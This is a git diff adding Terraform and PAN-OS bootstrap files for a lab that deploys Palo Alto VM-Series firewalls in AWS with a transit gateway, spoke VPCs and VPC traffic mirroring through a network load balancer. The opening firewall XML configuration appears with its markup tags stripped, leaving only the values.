-AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + 18.224.86.63 + 8.8.8.8 + 382932559738703 + mgmt-interface-swap + + + + + + + + + + + + + + + + + + + + + + + ethernet1/1 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + mirror + + + mirror + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + ethernet1/1 + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + + no + + + + vxlan + + + any + + + any + + + any + + + any + + + any + + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-Mirroring/nlb.tf b/aws/TGW-VPC-Mirroring/nlb.tf new file mode 100644 index 00000000..3835c45f --- /dev/null +++ b/aws/TGW-VPC-Mirroring/nlb.tf @@ -0,0 +1,39 @@ +resource "aws_lb" "mirror-lb" { + name = "mirror-lb-tf" + internal = true + load_balancer_type = "network" + subnets = ["${aws_subnet.vpc_mirror_pub_1.id}","${aws_subnet.vpc_mirror_pub_2.id}"] + + enable_deletion_protection = false + enable_cross_zone_load_balancing = true + tags = { + } +} +resource "aws_lb_target_group" "mirror-target" { + name = "mirror-target" + port = 4789 + protocol = "UDP" + vpc_id = "${aws_vpc.vpc_security.id}" + health_check { + port = 80 + protocol = "HTTP" + } +} +resource "aws_lb_listener" "mirror-listener" { + load_balancer_arn = "${aws_lb.mirror-lb.arn}" + port = "4789" + protocol = "UDP" + + default_action { + type = "forward" + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + } +} +resource "aws_lb_target_group_attachment" "mirror1" { + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + target_id = "${module.ngfw3.instanceid}" +} +resource "aws_lb_target_group_attachment" "mirror3" { + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + target_id = "${module.ngfw4.instanceid}" +} \ No newline at end of file diff --git a/aws/TGW-VPC-Mirroring/providers.tf b/aws/TGW-VPC-Mirroring/providers.tf new file mode 100644 index 00000000..af7b0ba3 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/providers.tf @@ -0,0 +1,3 @@ +provider "aws" { + region = "${var.aws_region}" +} diff --git a/aws/TGW-VPC-Mirroring/tgw.tf b/aws/TGW-VPC-Mirroring/tgw.tf new file mode 100644 index 00000000..191dce08 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/tgw.tf @@ -0,0 +1,51 @@ +resource "aws_ec2_transit_gateway" "tgw" { + description = "Transit Gateway" + vpn_ecmp_support = "enable" + default_route_table_association = "disable" + default_route_table_propagation = "disable" + dns_support = "enable" + auto_accept_shared_attachments = "disable" + + tags { + Name = "transit_gateway" + } +} + +resource "aws_ec2_transit_gateway_route_table" "tgw_security" { + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + + tags { + Name = "tgw-rtb-security" + } +} + +resource "aws_ec2_transit_gateway_route_table" "tgw_spokes" { + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + + tags { + Name = "tgw-rtb-spokes" + } +} + +resource "aws_ec2_transit_gateway_route" "default" { + destination_cidr_block = "0.0.0.0/0" + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}" + transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" +} + +resource "aws_ec2_transit_gateway_route_table_association" "vpc_security" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}" + transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} + +resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_security" { + vpc_id = "${aws_vpc.vpc_security.id}" + subnet_ids = ["${aws_subnet.vpc_security_tgw_1.id}", "${aws_subnet.vpc_security_tgw_2.id}"] + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + transit_gateway_default_route_table_association = false + transit_gateway_default_route_table_propagation = false + + tags { + Name = "tgw_attachment_security" + } +} diff --git a/aws/TGW-VPC-Mirroring/variables.tf b/aws/TGW-VPC-Mirroring/variables.tf new file mode 100644 index 00000000..80613943 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/variables.tf @@ -0,0 +1,181 @@ +//This section should be verified and modified accordingly. + +variable aws_region { + description = "AWS Region for deployment" + default = "us-east-2" +} + +variable aws_key { + description = "aws_key" + default = "AWS--Key" +} + +//Do not create these. The Terraform will do that. Just need to make secure +//the s3 bucket names are unique. + +variable bootstrap_s3bucket { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "tgw-bucket-1" +} + +variable bootstrap_s3bucket2 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "tgw-bucket-2" +} +variable bootstrap_s3bucket3 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "tgw-bucket-3" +} + +variable bootstrap_s3bucket4 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "tgw-bucket-4" +} +//End of the section that MUST be modified to work +variable management_cidr { + description = "CIDR Address for Management Access" + default = "0.0.0.0/0" +} + +variable vpc_security_cidr { + description = "CIDR Address for Security VPC" + default = "192.168.0.0/16" +} + +variable vpc_security_subnet_public_1 { + description = "CIDR Address for Security VPC" + default = "192.168.1.0/24" +} + +variable vpc_security_subnet_private_1 { + description = "CIDR Address for Security VPC" + default = "192.168.101.0/24" +} + +variable fw_ip_subnet_private_1 { + description = "CIDR Address for Security VPC" + default = "192.168.101.45" +} + +variable fw_ip_subnet_public_1 { + description = "CIDR Address for Security VPC" + default = "192.168.1.45" +} + +variable vpc_security_subnet_tgw_1 { + description = "CIDR Address for TGW Security VPC" + default = "192.168.11.0/24" +} +################# +# Mirror Subnets +################# +variable vpc_mirror_pub_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.0/24" +} +variable vpc_mirror_priv_1 { + description = "CIDR Address for Security VPC" + default = "192.168.52.0/24" +} +variable fw_ip_subnet_pub_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.45" +} +variable fw_ip_subnet_priv_1 { + description = "CIDR Address for Security VPC" + default = "192.168.52.45" +} +variable vpc_mirror_pub_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.0/24" +} +variable vpc_mirror_priv_2 { + description = "CIDR Address for Security VPC" + default = "192.168.62.0/24" +} +variable fw_ip_subnet_pub_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.45" +} +variable fw_ip_subnet_priv_2 { + description = "CIDR Address for Security VPC" + default = "192.168.62.45" +} +############# + + + +variable vpc_security_subnet_public_2 { + description = "CIDR Address for Security VPC" + default = "192.168.2.0/24" +} + +variable vpc_security_subnet_private_2 { + description = "CIDR Address for Security VPC" + default = "192.168.102.0/24" +} + +variable vpc_security_subnet_tgw_2 { + description = "CIDR Address for TGW Security VPC" + default = "192.168.21.0/24" +} + +variable fw_ip_subnet_private_2 { + description = "CIDR Address for Security VPC" + default = "192.168.102.45" +} + +variable fw_ip_subnet_public_2 { + description = "CIDR Address for Security VPC" + default = "192.168.2.45" +} + +variable spoke1_cidr { + description = "CIDR Address for Spoke1 VPC" + default = "10.1.0.0/16" +} + +variable spoke1_subnet { + description = "CIDR Address for Spoke1 Subnet" + default = "10.1.1.0/24" +} + +variable spoke1_subnet2 { + description = "CIDR Address for Spoke1 Subnet" + default = "10.1.2.0/24" +} + +variable spoke1_server { + description = "Server Address for Spoke1 Server" + default = "10.1.1.45" +} + +variable spoke1_server2 { + description = "Server Address for Spoke1 Server2" + default = "10.1.2.45" +} + +variable spoke2_cidr { + description = "CIDR Address for Spoke2 VPC" + default = "10.2.0.0/16" +} + +variable spoke2_subnet { + description = "CIDR Address for Spoke2 Subnet" + default = "10.2.1.0/24" +} + +variable spoke2_subnet2 { + description = "CIDR Address for Spoke2 Subnet" + default = "10.2.2.0/24" +} + +variable spoke2_server { + description = "Server Address for Spoke2 Server" + default = "10.2.1.45" +} + +variable spoke2_server2 { + description = "Server Address for Spoke2 Server2" + default = "10.2.2.45" +} diff --git a/aws/TGW-VPC-Mirroring/vm-series/main.tf b/aws/TGW-VPC-Mirroring/vm-series/main.tf new file mode 100644 index 00000000..12dbc9f7 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/vm-series/main.tf @@ -0,0 +1,170 @@ +variable name { + description = "firewall instance name" +} + +variable untrust_subnet_id {} +variable untrust_security_group_id {} +variable untrustfwip {} + +variable trust_subnet_id {} +variable trust_security_group_id {} +variable trustfwip {} + +variable management_subnet_id {} +variable management_security_group_id {} + +variable bootstrap_profile { + default = "" +} + +variable bootstrap_s3bucket {} + +variable tgw_id {} + +variable aws_region {} +variable aws_key {} + +variable instance_type { + default = "m5.xlarge" +} + +variable ngfw_license_type { + default = "payg2" +} + +variable ngfw_version { + default = "9.0" +} + +variable "license_type_map" { + type = "map" + + default = { + "byol" = "6njl1pau431dv1qxipg63mvah" + "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km" + "payg2" = "806j2of0qy5osgjjixq9gqc6g" + } +} + +data "aws_ami" "panw_ngfw" { + most_recent = true + owners = ["aws-marketplace"] + + filter { + name = "owner-alias" + values = ["aws-marketplace"] + } + + filter { + name = "product-code" + values = ["${var.license_type_map[var.ngfw_license_type]}"] + } + + filter { + name = "name" + values = ["PA-VM-AWS-${var.ngfw_version}*"] + } +} + +data "aws_region" "current" { + name = "${var.aws_region}" +} + +resource "aws_network_interface" "eni-management" { + subnet_id = "${var.management_subnet_id}" + security_groups = ["${var.management_security_group_id}"] + source_dest_check = true + + tags { + Name = "eni_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-trust" { + subnet_id = "${var.trust_subnet_id}" + private_ips = ["${var.trustfwip}"] + security_groups = ["${var.trust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_trust" + } +} + +output "eni-trust" { + value = "${aws_network_interface.eni-trust.id}" +} + +resource "aws_eip" "eip-management" { + vpc = true + network_interface = "${aws_network_interface.eni-management.id}" + + tags { + Name = "eip_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-untrust" { + subnet_id = "${var.untrust_subnet_id}" + private_ips = ["${var.untrustfwip}"] + security_groups = ["${var.untrust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_untrust" + } +} + +resource "aws_eip" "eip-untrust" { + vpc = true + network_interface = "${aws_network_interface.eni-untrust.id}" + + tags { + Name = "eip_${var.name}_untrust" + } +} + +resource "aws_instance" "instance-ngfw" { + disable_api_termination = false + instance_initiated_shutdown_behavior = "stop" + iam_instance_profile = "${var.bootstrap_profile}" + user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}" + + ebs_optimized = true + ami = "${data.aws_ami.panw_ngfw.image_id}" + instance_type = "${var.instance_type}" + key_name = "${var.aws_key}" + + monitoring = false + + network_interface { + device_index = 1 + network_interface_id = "${aws_network_interface.eni-management.id}" + } + + network_interface { + device_index = 0 + network_interface_id = "${aws_network_interface.eni-untrust.id}" + } + + network_interface { + device_index = 2 + network_interface_id = "${aws_network_interface.eni-trust.id}" + } + + tags { + Name = "${var.name}" + } +} + +output "eip_untrust" { + value = "${aws_eip.eip-untrust.public_ip}" +} + +output "eip_mgmt" { + value = "${aws_eip.eip-management.public_ip}" +} + +output "instanceid" { + value = "${aws_instance.instance-ngfw.id}" +} diff --git a/aws/TGW-VPC-Mirroring/vpc_security.tf b/aws/TGW-VPC-Mirroring/vpc_security.tf new file mode 100644 index 00000000..5ff14424 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/vpc_security.tf @@ -0,0 +1,426 @@ +data "aws_availability_zones" "available" {} + +resource "aws_vpc" "vpc_security" { + cidr_block = "${var.vpc_security_cidr}" + + tags { + Name = "vpc_security" + } +} + +resource "aws_subnet" "vpc_security_public_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_public_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_public_1" + } +} + +resource "aws_subnet" "vpc_security_public_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_public_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_public_2" + } +} +################# +# Mirror Subnets +################# +resource "aws_subnet" "vpc_mirror_pub_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_pub_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_mirror_pub_1" + } +} + +resource "aws_subnet" "vpc_mirror_priv_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_priv_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_mirror_priv_1" + } +} +resource "aws_subnet" "vpc_mirror_pub_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_pub_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_mirror_pub_2" + } +} + +resource "aws_subnet" "vpc_mirror_priv_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_priv_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_mirror_priv_2" + } +} +################### + +resource "aws_subnet" "vpc_security_private_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_private_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_private_1" + } +} + +resource "aws_subnet" "vpc_security_private_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_private_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_private_2" + } +} + +resource "aws_subnet" "vpc_security_tgw_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_tgw_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_tgw_1" + } +} + +resource "aws_subnet" "vpc_security_tgw_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_tgw_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_tgw_2" + } +} + +resource "aws_route_table" "vpc_security_tgw_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "tgw_1" + } +} + +resource "aws_route_table" "vpc_security_tgw_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "tgw_2" + } +} + +resource "aws_route_table" "vpc_security_private_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "private_1" + } +} + +resource "aws_route_table" "vpc_security_private_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "private_2" + } +} + +resource "aws_route_table_association" "vpc_security_private_1" { + subnet_id = "${aws_subnet.vpc_security_private_1.id}" + route_table_id = "${aws_route_table.vpc_security_private_1.id}" +} + +resource "aws_route_table_association" "vpc_security_private_2" { + subnet_id = "${aws_subnet.vpc_security_private_2.id}" + route_table_id = "${aws_route_table.vpc_security_private_2.id}" +} + +resource "aws_route_table_association" "vpc_security_tgw_1" { + subnet_id = "${aws_subnet.vpc_security_tgw_1.id}" + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" +} + +resource "aws_route_table_association" "vpc_security_tgw_2" { + subnet_id = "${aws_subnet.vpc_security_tgw_2.id}" + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" +} + +resource "aws_route" "vpc_security_tgw_1_0" { + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" + destination_cidr_block = "0.0.0.0/0" + network_interface_id = "${module.ngfw1.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_1_1" { + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" + destination_cidr_block = "10.0.0.0/8" + network_interface_id = "${module.ngfw1.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_2_0" { + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" + destination_cidr_block = "0.0.0.0/0" + network_interface_id = "${module.ngfw2.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_2_1" { + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" + destination_cidr_block = "10.0.0.0/8" + network_interface_id = "${module.ngfw2.eni-trust}" +} + +resource "aws_route" "vpc_security_trust_1_0" { + route_table_id = "${aws_route_table.vpc_security_private_1.id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" +} + +resource "aws_route" "vpc_security_trust_2_0" { + route_table_id = "${aws_route_table.vpc_security_private_2.id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" +} + +resource "aws_internet_gateway" "vpc_security_igw" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "vpc_securty_igw" + } +} + +resource "aws_route" "vpc_security_default" { + route_table_id = "${aws_vpc.vpc_security.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + gateway_id = "${aws_internet_gateway.vpc_security_igw.id}" +} + +resource "aws_security_group" "allow_all" { + name = "allow_all" + description = "Allow all inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_all_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group_rule" "allow_all_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group" "allow_https_ssh" { + name = "allow_https_ssh" + description = "Allow HTTPS and SSH inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_ssh_ingress" { + type = "ingress" + from_port = 22 + to_port = 22 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_https_ingress" { + type = "ingress" + from_port = 443 + to_port = 443 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_all" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +module "ngfw1" { + source = "./vm-series/" + + name = "ngfw1" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_security_private_1.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_private_1}" + + untrust_subnet_id = "${aws_subnet.vpc_security_public_1.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_public_1 }" + + management_subnet_id = "${aws_subnet.vpc_security_public_1.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} + +module "ngfw2" { + source = "./vm-series/" + + name = "ngfw2" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_security_private_2.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_private_2}" + + untrust_subnet_id = "${aws_subnet.vpc_security_public_2.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_public_2 }" + + management_subnet_id = "${aws_subnet.vpc_security_public_2.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile2.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket2}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} +################### +# VPC Mirror FWs +################### +module "ngfw3" { + source = "./vm-series/" + + name = "ngfw3" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_mirror_priv_1.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_priv_1}" + + untrust_subnet_id = "${aws_subnet.vpc_mirror_pub_1.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_pub_1}" + + management_subnet_id = "${aws_subnet.vpc_mirror_pub_1.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile3.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket3}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} +module "ngfw4" { + source = "./vm-series/" + + name = "ngfw4" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_mirror_priv_2.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_priv_2}" + + untrust_subnet_id = "${aws_subnet.vpc_mirror_pub_2.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_pub_2}" + + management_subnet_id = "${aws_subnet.vpc_mirror_pub_2.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile4.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket4}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} +####################### +output "FW-1-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw1.eip_mgmt}" +} +output "FW-3-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw3.eip_mgmt}" +} +output "FW-4-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw4.eip_mgmt}" +} +output "Server-1-1_ngfw1_access" { + value = "Access Server 1-1 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 1001" +} + +output "Server-1-2_ngfw1_access" { + value = "Access Server 1-2 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 1002" +} + +output "Server-2-1_ngfw1_access" { + value = "Access Server 2-1 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 2001" +} + +output "Server-2-2_ngfw1_access" { + value = "Access Server 2-2 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 2002" +} + +output "FW-2-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw2.eip_mgmt}" +} + +output "Server-1-1_ngfw2_access" { + value = "Access Server 1-1 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 1001" +} + +output "Server-1-2_ngfw2_access" { + value = "Access Server 1-2 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 1002" +} + +output "Server-2-1_ngfw2_access" { + value = "Access Server 2-1 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 2001" +} + +output "Server-2-2_ngfw2_access" { + value = "Access Server 2-2 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 2002" +} diff --git a/aws/TGW-VPC-Mirroring/vpc_spoke/main.tf b/aws/TGW-VPC-Mirroring/vpc_spoke/main.tf new file mode 100644 index 00000000..5d3673ed --- /dev/null +++ b/aws/TGW-VPC-Mirroring/vpc_spoke/main.tf @@ -0,0 +1,191 @@ +variable vpc_spoke_cidr { + description = "CIDR Network Address for Spoke VPC" +} + +variable vpc_spoke_subnet_cidr { + description = "CIDR Network Address for Spoke Subnet" +} + +variable vpc_spoke_subnet2_cidr { + description = "CIDR Network Address for Spoke Subnet" +} + +variable aws_tgw_id { + description = "AWS Transit Gateway ID" +} + +variable aws_tgw_security_rtb_id { + description = "AWS Transit Gateway Route Table Id" +} + +variable aws_tgw_spoke_rtb_id { + description = "AWS Transit Gateway Route Table Id" +} + +variable pemkey { + description = "AWS pem KEY" +} + +variable serverip { + description = "Ubuntu Server IP" +} + +variable server2ip { + description = "Ubuntu Server2 IP" +} + +variable servername { + description = "Ubuntu Server name" +} + +variable server2name { + description = "Ubuntu Server2 name" +} + +resource "aws_vpc" "vpc_spoke" { + cidr_block = "${var.vpc_spoke_cidr}" + + tags { + Name = "vpc_spoke_${var.vpc_spoke_cidr}" + } +} + +data "aws_availability_zones" "available" {} + +resource "aws_subnet" "primary" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + cidr_block = "${var.vpc_spoke_subnet_cidr}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_spokeA_${var.vpc_spoke_subnet_cidr}" + } +} + +resource "aws_subnet" "secondary" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + cidr_block = "${var.vpc_spoke_subnet2_cidr}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_spokeB_${var.vpc_spoke_subnet2_cidr}" + } +} + +resource "aws_security_group" "server_sg" { + name = "server_sg" + description = "Allow select inbound traffic" + vpc_id = "${aws_vpc.vpc_spoke.id}" +} + +resource "aws_security_group_rule" "allow_server_sg_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 